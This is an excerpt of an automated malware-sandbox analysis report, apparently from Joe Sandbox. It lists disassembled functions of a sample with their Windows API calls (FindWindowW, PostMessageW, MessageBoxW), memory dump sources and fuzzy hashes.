                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                              • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                              • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                              • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                              Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                              • PostMessageW.USER32(00000000), ref: 00442247
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                              • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                              • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                              • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                              Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Message_doexit
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 1993061046-4017498283
                                                                              • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                              • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                              • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                              • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E